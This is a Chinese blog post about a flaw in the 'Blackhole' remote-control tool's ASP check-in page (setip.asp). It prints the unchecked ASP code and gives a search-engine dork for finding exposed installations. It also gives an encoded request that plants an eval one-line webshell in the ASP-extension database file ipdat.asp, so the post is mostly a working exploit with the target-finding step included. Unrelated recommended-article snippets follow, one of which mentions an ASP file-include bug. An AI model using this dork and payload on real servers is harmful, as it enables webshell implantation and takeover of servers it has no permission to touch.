黑洞的ASP上线系统的一个漏洞

最新推荐文章于 2025-09-11 20:53:34 发布
最新推荐文章于 2025-09-11 20:53:34 发布
阅读量107 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_33798152/article/details/85189426
本文分析了一种存在于ASP上线系统中的安全漏洞,攻击者可通过特定请求获取目标服务器的webshell。漏洞利用过程中,攻击者可以修改数据库中的IP信息,进而实现远程控制。文章详细展示了如何构造恶意请求以及执行eval命令的过程。
作者: toby57
在默认的情况下,利用该漏洞可得到上线系统所在服务器的webshell
ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp
写入配置时对参数未作检查,setip.asp相关代码 
<%
strIP=Trim(Request.QueryString("Ip"))
strPort=Trim(Request.QueryString("Port"))
strType=Trim(Request.QueryString("Type"))
if strType="0" then
strIP=Request.ServerVariables("REMOTE_HOST")
end if
sql="select * from Info where strMark='Main'"
rs.Open sql,conn,1,3
if not rs.eof or not rs.bof then
rs("strIPAddress")=strIP
rs("strPort")=strPort
rs("strType")=strType
rs.update
'不要修改下面的反馈字符.否则程序不知道是否更新成功.
response.write "update success!"
else
response.write "update fail!"
end if
set rs=nothing
conn.close
set conn=nothing
以“inurl:setip.asp”为关键字找了一个测试地址http://xxx.com/blackhole/setip.asp
提交
http://xxx.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7
这样就插入了EVAL一句话
ipdat.asp
_miccretti
关注
网络安全防御体系中网络安全检查设备
m0_73803866的博客
09-30 1543
3)反弹交互式Shell功能。1)资产及应用发现:通过数据挖掘和调研的方式确定企业资产范 围,之后基于IP或域名,采用Web扫描技术、操作系统探测技术、端口 探测技术、服务探测技术、Web爬虫技术等各类探测技术,对参演单位 信息系统内的主机/服务器、安全设备、网络设备、工控设备、Web应 用、中间件、数据库、邮件系统和DNS系统等进行主动发现,并生成资 产及应用列表,列表中不仅包括设备类型、域名、IP、端口,更可深 入识别运行在资产上的中间件、应用、技术架构的详细情况(类型、 版本、服务名称等)。
无比炫酷唯一的宇宙黑洞动画,宇宙黑洞系统,4K分辨率
04-09
这个动画不仅仅是对黑洞的简单描绘,更是一个完整的宇宙黑洞系统,通过精心设计的粒子系统,再现了黑洞的吞噬、旋转以及引力效应。 首先,我们要理解黑洞的概念。黑洞是由于恒星在其生命周期结束后发生坍缩,形成的...
ASP中可能出现的一种包含漏洞(Server.execute)
weixin_34268753的博客
02-28 176
author: bin <% Server.execute(request(“file”)) %> 与include的区别,它可以动态包含文件。 被包含文件里面可执行ASP代码,在国外的源码中有使用的。 include.asp?file=./1.txt 1.txt <%response.write(now())%> 转载于:https:...
ASP常见的安全漏洞
xergnvij
04-20 660
ASP漏洞已经算很少的了,想要找到数据库的实际位置也不简单,但这不表明黑客无孔可入,也正是这个观点,一般的程序设计员常常忘记仔细的检查是否有漏洞,所以才有可能导致网站资料被窃取的事件发生。今天我在这里和大家谈谈ASP常见的安全漏洞,以引起大家的重视及采取有效的防范措施。(注意,在本文中所介绍的方法请大家不要试用,请大家自觉遵守网络准则,谢谢!)   Microsoft 的 Internet I
Gh0st上线更新专用ASP文件
05-14 1039
input {font-family: “Verdana”;font-size: “11px”;BACKGROUND-COLOR: “#FFFFFF”;height: “18px”;border: “1px solid #666666″;}body ,td{font-size: 11px; font-family: Verdana;}if request.form(”str”) “” thenif
ASP.NET】发布网站上线具体流程
两水先木示的博客
02-10 2988
目录 软件:VS2017、SQL SERVER 2008 目标:纯用IP地址访问 ASP.NET网站,服务器自己装SQL SERVER 2008 ,成功远程连接数据库,成功访问网站。 1、上网找 某云 买个云服务器,买后会得到一个公网IP。 2、远程连接服务器,安装IIS服务和安装FTP服务 (若链接已失效,百度找"window server 2008 安装xxx服务 即可) 2.1 注...
Web攻防——各脚本语言特有漏洞ASP
weixin_44616206的博客
01-31 4149
Web攻防——各脚本语言特有漏洞总结之ASP 脚本语言 ASP ASPX PHP JAVA Python JavaScipt 通用安全漏洞 ASP 常见搭建组合:win+iis+asp+access(sqlserver) IIS搭建网站 IIS中间件 网站源码和组件 IIS配置站点 地址+站点+映射目录 设置主页文件 配置解析asp服务 启用父路径 给予该网站目录读写数据库的权限 访问 登录 例:Easycms、aspcms等:安装包安装->新建网站->设置首页文件-
安全防御设备都应该购买哪些
securitypaper的博客
10-09 343
资产及应用发现:通过数据挖掘和调研的方式确定企业资产范 围,之后基于IP或域名,采用Web扫描技术、操作系统探测技术、端口 探测技术、服务探测技术、Web爬虫技术等各类探测技术,对参演单位 信息系统内的主机
渗透测试 ( 1 ) --- 相关术语、必备 工具、导航、全流程总结、入侵网站思路
热门推荐
freeking101的博客
07-02 3万+
在学习某项技能的时,要用最快的时间摸索清楚最少必要知识 (MAKE)都有哪些? 然后迅速地掌握它们,这样就实现了 "快速入门",然后就可以开始动手实践,然后在实践中验证理论、加深理解,同时继续扩展学习。而学习黑客也是同样的道理,对于新手小白的第一课应该是以掌握基础的安全工具为主,这样在学习的同时可以进行实践,验证所学的知识,同时加以扩展,这样学习效率会大大提升.........................................................
黑洞一个demo.7z
07-23
描述中提到的“炫酷的黑洞demo”意味着这是一个视觉效果吸引人的项目,利用了JavaScript来处理时间和动态效果,让观众能够看到类似黑洞引力作用下的物体旋转和扭曲。JavaScript中的时间计算可能涉及到了`Date`对象...
一个非奇异的旋转黑洞
03-29
我们采用概率分布启发质量函数m(r)替换了Kerr黑洞质量M,以表示一个非奇异旋转黑洞,该黑洞渐近地被标识为(r≫k,k> 0常数),与Kerr–Newman黑洞正好相同, 当k = 0时作为Kerr黑洞。 辐射对等体在适当的限制下...
【天体】基于Matlab模拟一个黑洞一个物体穿过他们的视野的路径.rar
11-19
本压缩包文件包含了使用Matlab编程语言创建的一个模型,其目的是模拟一个黑洞一个物体在视野中穿行的路径。Matlab是一种高性能的数值计算和可视化软件,广泛应用于工程计算、数据分析、算法开发等领域。通过该软件...
西西弗斯黑洞【123数字黑洞】 卡普雷卡尔黑洞(重排求差黑洞):三位数黑洞495
05-04
/// ​设定一个任意数字串,数出这个数中的偶数个数,奇数个数,及这个数中所包含的所有位数的总数 /// 比如86420135799,按照偶数个数5,奇数个数6,数字总个数11,拼接成一个新的整数 5611 /// 然后依次转化为...
为什么要显示调用析构函数
最新发布
python_girl9475的博客
09-11 239
如果类内存在手动申请的资源、数据库连接、文件句柄、网络连接,则无法释放,会造成资源泄露。
SAP HANA Scale-out 03:Performance Guide
SAP攻城狮
09-10 1066
HEX EngineThe SAP HANA Execution Engine (HEX)是一个查询执行引擎,从长远来看将取代其他SAP HANA引擎,如连接引擎和OLAP引擎.所有功能都整合在HEX中,从而消除不同引擎之间的物化过程。HEX引擎通过在准备阶段创建适当的SQL计划来连接SQL层和存储层。HEX引擎中的数据是流式处理的,因此可以快速获取第一批结果行,而无需等待所有结果行都被处理。HEX引擎中的操作符是管道化的,改进了并行化并可以减少内存消耗。
Redis哨兵
2502_92141759的博客
09-10 861
哨兵的结构如图::Sentinel 会不断检查您的master和slave是否按预期工作:如果master故障,Sentinel会将一个slave提升为master。当故障实例恢复后也以新的master为主:Sentinel充当Redis客户端的服务发现来源,当集群发生故障转移时,会将最新信息推送给Redis的客户端。
计算机毕设 java 高校饭堂点餐系统 基于微信小程序 + SSM 的高校餐饮服务平台 Java+MySQL 的点餐与运营系统
毕设源码伍学长
09-10 1020
在高校饭堂就餐需求增长的背景下,传统点餐依赖窗口排队、效率低,存在高峰期拥堵、菜品信息不透明等问题,难以满足师生便捷就餐需求。采用 Java 技术、SSM 框架、Uni-weixin 技术及 MySQL 数据库,开发高校饭堂点餐系统(微信小程序端 + 服务端),整合菜品展示、在线点餐、订单跟踪等功能,支持管理员、商家、用户三类角色协同,打造专业化餐饮服务平台。该系统既能帮助管理员监管平台内容,商家高效管理菜品与订单,又能让用户便捷查询菜品、完成点餐,提升高校饭堂服务效率与用户体验。
Redisson可重入锁原理-举个通俗的栗子
m0_73609995的博客
09-08 680
Redisson可重入锁通过智能的"钥匙管理"机制解决了嵌套加锁问题。它采用Redis的Hash结构记录锁信息,包含线程标识和重入次数。当同一线程重复获取锁时,只需增加计数器而非重新竞争;释放锁时递减计数器,归零时才真正释放。这种设计允许线程安全地多次获取同一把锁,避免了死锁风险。所有操作通过Lua脚本原子执行,确保线程安全,完美支持方法嵌套调用场景。
PostgreSQL打印实时查询语句(监控PostgreSQL监控)(未成功)
Dontla的博客
09-08 651
定期执行以下 SQL 语句(可通过脚本或。
黑洞远控软件上线教程与使用指南
一个文件“黑洞 使用 教程.doc”是一个Word文档,通常用于详细说明软件的使用步骤、配置方法以及常见问题解答。从命名来看,它应该涵盖了从软件安装、账户注册、服务器连接、权限设置、远程操作等多个环节的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值